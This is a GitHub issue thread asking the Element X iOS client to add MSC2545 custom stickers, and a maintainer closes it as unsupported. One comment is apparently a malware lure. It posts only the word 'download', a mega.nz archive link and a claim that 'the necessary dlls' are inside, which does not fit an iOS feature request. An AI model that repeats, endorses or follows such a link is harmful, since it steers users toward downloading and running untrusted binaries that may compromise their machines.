### ISSUE TITLE
Implement msc2545 Custom Stickers

### ISSUE THREAD

**Issue by tearfulDalvik** [element-hq/element-x-ios#3306]
**Is your feature request related to a problem? Please describe.**
No

**Describe the solution you'd like**
make and use msc2545 stickers

**Describe alternatives you've considered**
the default stickers are boring

the homeserver admin dictates the integrateons

fluffychat is the only option for mobile and its ok but misses minor stuff i also want

**Additional context**
This is a replica of https://github.com/element-hq/element-android/issues/6193

**Comment by achilles0x** [comment]
download

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by pixlwave** [comment]
Given that Element X doesn't support any integrations or sending stickers, I'm going to close this for now.
